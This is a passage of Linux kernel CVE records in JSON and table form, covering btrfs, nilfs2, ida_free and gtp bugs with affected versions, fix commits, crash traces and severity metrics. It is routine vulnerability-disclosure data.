"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.8.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: do not ASSERT() if the newly created subvolume already got read\n\n[BUG]\nThere is a syzbot crash, triggered by the ASSERT() during subvolume\ncreation:\n\n assertion failed: !anon_dev, in fs/btrfs/disk-io.c:1319\n ------------[ cut here ]------------\n kernel BUG at fs/btrfs/disk-io.c:1319!\n invalid opcode: 0000 [#1] PREEMPT SMP KASAN\n RIP: 0010:btrfs_get_root_ref.part.0+0x9aa/0xa60\n \u003cTASK\u003e\n btrfs_get_new_fs_root+0xd3/0xf0\n create_subvol+0xd02/0x1650\n btrfs_mksubvol+0xe95/0x12b0\n __btrfs_ioctl_snap_create+0x2f9/0x4f0\n btrfs_ioctl_snap_create+0x16b/0x200\n btrfs_ioctl+0x35f0/0x5cf0\n __x64_sys_ioctl+0x19d/0x210\n do_syscall_64+0x3f/0xe0\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n ---[ end trace 0000000000000000 ]---\n\n[CAUSE]\nDuring create_subvol(), after inserting root item for the newly created\nsubvolume, we would trigger btrfs_get_new_fs_root() to get the\nbtrfs_root of that subvolume.\n\nThe idea here is, we have preallocated an anonymous device number for\nthe subvolume, thus we can assign it to the new subvolume.\n\nBut there is really nothing preventing things like backref walk to read\nthe new subvolume.\nIf that happens before we call btrfs_get_new_fs_root(), the subvolume\nwould be read out, with a new anonymous device number assigned already.\n\nIn that case, we would trigger ASSERT(), as we really expect no one to\nread out that subvolume (which is not yet accessible from the fs).\nBut things like backref walk is still possible to trigger the read on\nthe subvolume.\n\nThus our assumption on the ASSERT() is not correct in the first place.\n\n[FIX]\nFix it by removing the ASSERT(), and just free the @anon_dev, reset it\nto 0, and continue.\n\nIf the subvolume tree is read out by something else, it should have\nalready get a new anon_dev assigned thus we only need to free the\npreallocated one."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:54:36.081Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3f5d47eb163bceb1b9e613c9003bae5fefc0046f"
},
{
"url": "https://git.kernel.org/stable/c/e31546b0f34af21738c4ceac47d662c00ee6382f"
},
{
"url": "https://git.kernel.org/stable/c/66b317a2fc45b2ef66527ee3f8fa08fb5beab88d"
},
{
"url": "https://git.kernel.org/stable/c/833775656d447c545133a744a0ed1e189ce61430"
},
{
"url": "https://git.kernel.org/stable/c/5a172344bfdabb46458e03708735d7b1a918c468"
},
{
"url": "https://git.kernel.org/stable/c/e03ee2fe873eb68c1f9ba5112fee70303ebf9dfb"
}
],
"title": "btrfs: do not ASSERT() if the newly created subvolume already got read",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26727",
"datePublished": "2024-04-03T14:55:25.805Z",
"dateReserved": "2024-02-19T14:20:24.164Z",
"dateUpdated": "2025-05-04T12:54:36.081Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26981 (GCVE-0-2024-26981)
Vulnerability from cvelistv5
Published
2024-05-01 05:27
Modified
2025-11-04 17:14
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: fix OOB in nilfs_set_de_type
The size of the nilfs_type_by_mode array in the fs/nilfs2/dir.c file is
defined as "S_IFMT >> S_SHIFT", but the nilfs_set_de_type() function,
which uses this array, specifies the index to read from the array in the
same way as "(mode & S_IFMT) >> S_SHIFT".
static void nilfs_set_de_type(struct nilfs_dir_entry *de, struct inode
*inode)
{
umode_t mode = inode->i_mode;
de->file_type = nilfs_type_by_mode[(mode & S_IFMT)>>S_SHIFT]; // oob
}
However, when the index is determined this way, an out-of-bounds (OOB)
error occurs by referring to an index that is 1 larger than the array size
when the condition "mode & S_IFMT == S_IFMT" is satisfied. Therefore, a
patch to resize the nilfs_type_by_mode array should be applied to prevent
OOB errors.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 2ba466d74ed74f073257f86e61519cb8f8f46184 Version: 2ba466d74ed74f073257f86e61519cb8f8f46184 Version: 2ba466d74ed74f073257f86e61519cb8f8f46184 Version: 2ba466d74ed74f073257f86e61519cb8f8f46184 Version: 2ba466d74ed74f073257f86e61519cb8f8f46184 Version: 2ba466d74ed74f073257f86e61519cb8f8f46184 Version: 2ba466d74ed74f073257f86e61519cb8f8f46184 Version: 2ba466d74ed74f073257f86e61519cb8f8f46184 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26981",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-17T14:33:30.572731Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-17T14:33:40.696Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:14:55.924Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/054f29e9ca05be3906544c5f2a2c7321c30a4243"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/90f43980ea6be4ad903e389be9a27a2a0018f1c8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7061c7efbb9e8f11ce92d6b4646405ea2b0b4de1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bdbe483da21f852c93b22557b146bc4d989260f0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/897ac5306bbeb83e90c437326f7044c79a17c611"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2382eae66b196c31893984a538908c3eb7506ff9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/90823f8d9ecca3d5fa6b102c8e464c62f416975f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c4a7dc9523b59b3e73fd522c73e95e072f876b16"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/dir.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "054f29e9ca05be3906544c5f2a2c7321c30a4243",
"status": "affected",
"version": "2ba466d74ed74f073257f86e61519cb8f8f46184",
"versionType": "git"
},
{
"lessThan": "90f43980ea6be4ad903e389be9a27a2a0018f1c8",
"status": "affected",
"version": "2ba466d74ed74f073257f86e61519cb8f8f46184",
"versionType": "git"
},
{
"lessThan": "7061c7efbb9e8f11ce92d6b4646405ea2b0b4de1",
"status": "affected",
"version": "2ba466d74ed74f073257f86e61519cb8f8f46184",
"versionType": "git"
},
{
"lessThan": "bdbe483da21f852c93b22557b146bc4d989260f0",
"status": "affected",
"version": "2ba466d74ed74f073257f86e61519cb8f8f46184",
"versionType": "git"
},
{
"lessThan": "897ac5306bbeb83e90c437326f7044c79a17c611",
"status": "affected",
"version": "2ba466d74ed74f073257f86e61519cb8f8f46184",
"versionType": "git"
},
{
"lessThan": "2382eae66b196c31893984a538908c3eb7506ff9",
"status": "affected",
"version": "2ba466d74ed74f073257f86e61519cb8f8f46184",
"versionType": "git"
},
{
"lessThan": "90823f8d9ecca3d5fa6b102c8e464c62f416975f",
"status": "affected",
"version": "2ba466d74ed74f073257f86e61519cb8f8f46184",
"versionType": "git"
},
{
"lessThan": "c4a7dc9523b59b3e73fd522c73e95e072f876b16",
"status": "affected",
"version": "2ba466d74ed74f073257f86e61519cb8f8f46184",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/dir.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.30"
},
{
"lessThan": "2.6.30",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.157",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.88",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.29",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.157",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.88",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.29",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.8",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: fix OOB in nilfs_set_de_type\n\nThe size of the nilfs_type_by_mode array in the fs/nilfs2/dir.c file is\ndefined as \"S_IFMT \u003e\u003e S_SHIFT\", but the nilfs_set_de_type() function,\nwhich uses this array, specifies the index to read from the array in the\nsame way as \"(mode \u0026 S_IFMT) \u003e\u003e S_SHIFT\".\n\nstatic void nilfs_set_de_type(struct nilfs_dir_entry *de, struct inode\n *inode)\n{\n\tumode_t mode = inode-\u003ei_mode;\n\n\tde-\u003efile_type = nilfs_type_by_mode[(mode \u0026 S_IFMT)\u003e\u003eS_SHIFT]; // oob\n}\n\nHowever, when the index is determined this way, an out-of-bounds (OOB)\nerror occurs by referring to an index that is 1 larger than the array size\nwhen the condition \"mode \u0026 S_IFMT == S_IFMT\" is satisfied. Therefore, a\npatch to resize the nilfs_type_by_mode array should be applied to prevent\nOOB errors."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:01:24.942Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/054f29e9ca05be3906544c5f2a2c7321c30a4243"
},
{
"url": "https://git.kernel.org/stable/c/90f43980ea6be4ad903e389be9a27a2a0018f1c8"
},
{
"url": "https://git.kernel.org/stable/c/7061c7efbb9e8f11ce92d6b4646405ea2b0b4de1"
},
{
"url": "https://git.kernel.org/stable/c/bdbe483da21f852c93b22557b146bc4d989260f0"
},
{
"url": "https://git.kernel.org/stable/c/897ac5306bbeb83e90c437326f7044c79a17c611"
},
{
"url": "https://git.kernel.org/stable/c/2382eae66b196c31893984a538908c3eb7506ff9"
},
{
"url": "https://git.kernel.org/stable/c/90823f8d9ecca3d5fa6b102c8e464c62f416975f"
},
{
"url": "https://git.kernel.org/stable/c/c4a7dc9523b59b3e73fd522c73e95e072f876b16"
}
],
"title": "nilfs2: fix OOB in nilfs_set_de_type",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26981",
"datePublished": "2024-05-01T05:27:06.469Z",
"dateReserved": "2024-02-19T14:20:24.204Z",
"dateUpdated": "2025-11-04T17:14:55.924Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-6915 (GCVE-0-2023-6915)
Vulnerability from cvelistv5
Published
2024-01-15 09:32
Modified
2025-11-06 19:47
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-476 - NULL Pointer Dereference
Summary
A Null pointer dereference problem was found in ida_free in lib/idr.c in the Linux Kernel. This issue may allow an attacker using this library to cause a denial of service problem due to a missing check at a function return.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-553.rt7.342.el8_10 < * cpe:/a:redhat:enterprise_linux:8::realtime cpe:/a:redhat:enterprise_linux:8::nfv |
|||||||||||||||||||||||||||||||||||||
|
|||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T08:42:08.421Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2024:2394",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2394"
},
{
"name": "RHSA-2024:2950",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2950"
},
{
"name": "RHSA-2024:3138",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3138"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-6915"
},
{
"name": "RHBZ#2254982",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254982"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/torvalds/linux/commit/af73483f4e8b6f5c68c9aa63257bdd929a9c194a"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-6915",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-06-17T20:13:23.064257Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-06-17T20:13:38.739Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::realtime",
"cpe:/a:redhat:enterprise_linux:8::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-553.rt7.342.el8_10",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8::baseos",
"cpe:/a:redhat:enterprise_linux:8::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-553.el8_10",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-427.13.1.el9_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-427.13.1.el9_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"credits": [
{
"lang": "en",
"value": "Red Hat would like to thank ZhengHan Wang (Hillstone Network) for reporting this issue."
}
],
"datePublic": "2024-01-15T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A Null pointer dereference problem was found in ida_free in lib/idr.c in the Linux Kernel. This issue may allow an attacker using this library to cause a denial of service problem due to a missing check at a function return."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-06T19:47:03.149Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2024:2394",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2394"
},
{
"name": "RHSA-2024:2950",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2950"
},
{
"name": "RHSA-2024:3138",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3138"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-6915"
},
{
"name": "RHBZ#2254982",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254982"
},
{
"url": "https://github.com/torvalds/linux/commit/af73483f4e8b6f5c68c9aa63257bdd929a9c194a"
}
],
"timeline": [
{
"lang": "en",
"time": "2023-12-18T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2024-01-15T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Kernel: null pointer dereference vulnerability in ida_free in lib/idr.c",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability."
}
],
"x_redhatCweChain": "CWE-476: NULL Pointer Dereference"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2023-6915",
"datePublished": "2024-01-15T09:32:32.741Z",
"dateReserved": "2023-12-18T10:23:45.596Z",
"dateUpdated": "2025-11-06T19:47:03.149Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26754 (GCVE-0-2024-26754)
Vulnerability from cvelistv5
Published
2024-04-03 17:00
Modified
2025-05-04 08:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
gtp: fix use-after-free and null-ptr-deref in gtp_genl_dump_pdp()
The gtp_net_ops pernet operations structure for the subsystem must be
registered before registering the generic netlink family.
Syzkaller hit 'general protection fault in gtp_genl_dump_pdp' bug:
general protection fault, probably for non-canonical address
0xdffffc0000000002: 0000 [#1] PREEMPT SMP KASAN NOPTI
KASAN: null-ptr-deref in range [0x0000000000000010-0x0000000000000017]
CPU: 1 PID: 5826 Comm: gtp Not tainted 6.8.0-rc3-std-def-alt1 #1
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.0-alt1 04/01/2014
RIP: 0010:gtp_genl_dump_pdp+0x1be/0x800 [gtp]
Code: c6 89 c6 e8 64 e9 86 df 58 45 85 f6 0f 85 4e 04 00 00 e8 c5 ee 86
df 48 8b 54 24 18 48 b8 00 00 00 00 00 fc ff df 48 c1 ea 03 <80>
3c 02 00 0f 85 de 05 00 00 48 8b 44 24 18 4c 8b 30 4c 39 f0 74
RSP: 0018:ffff888014107220 EFLAGS: 00010202
RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000
RDX: 0000000000000002 RSI: 0000000000000000 RDI: 0000000000000000
RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000
R13: ffff88800fcda588 R14: 0000000000000001 R15: 0000000000000000
FS: 00007f1be4eb05c0(0000) GS:ffff88806ce80000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f1be4e766cf CR3: 000000000c33e000 CR4: 0000000000750ef0
PKRU: 55555554
Call Trace:
<TASK>
? show_regs+0x90/0xa0
? die_addr+0x50/0xd0
? exc_general_protection+0x148/0x220
? asm_exc_general_protection+0x22/0x30
? gtp_genl_dump_pdp+0x1be/0x800 [gtp]
? __alloc_skb+0x1dd/0x350
? __pfx___alloc_skb+0x10/0x10
genl_dumpit+0x11d/0x230
netlink_dump+0x5b9/0xce0
? lockdep_hardirqs_on_prepare+0x253/0x430
? __pfx_netlink_dump+0x10/0x10
? kasan_save_track+0x10/0x40
? __kasan_kmalloc+0x9b/0xa0
? genl_start+0x675/0x970
__netlink_dump_start+0x6fc/0x9f0
genl_family_rcv_msg_dumpit+0x1bb/0x2d0
? __pfx_genl_family_rcv_msg_dumpit+0x10/0x10
? genl_op_from_small+0x2a/0x440
? cap_capable+0x1d0/0x240
? __pfx_genl_start+0x10/0x10
? __pfx_genl_dumpit+0x10/0x10
? __pfx_genl_done+0x10/0x10
? security_capable+0x9d/0xe0
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 459aa660eb1d8ce67080da1983bb81d716aa5a69 Version: 459aa660eb1d8ce67080da1983bb81d716aa5a69 Version: 459aa660eb1d8ce67080da1983bb81d716aa5a69 Version: 459aa660eb1d8ce67080da1983bb81d716aa5a69 Version: 459aa660eb1d8ce67080da1983bb81d716aa5a69 Version: 459aa660eb1d8ce67080da1983bb81d716aa5a69 Version: 459aa660eb1d8ce67080da1983bb81d716aa5a69 Version: 459aa660eb1d8ce67080da1983bb81d716aa5a69 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.216Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f0ecdfa679189d26aedfe24212d4e69e42c2c861"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f8cbd1791900b5d96466eede8e9439a5b9ca4de7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2e534fd15e5c2ca15821c897352cf0e8a3e30dca"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a576308800be28f2eaa099e7caad093b97d66e77"
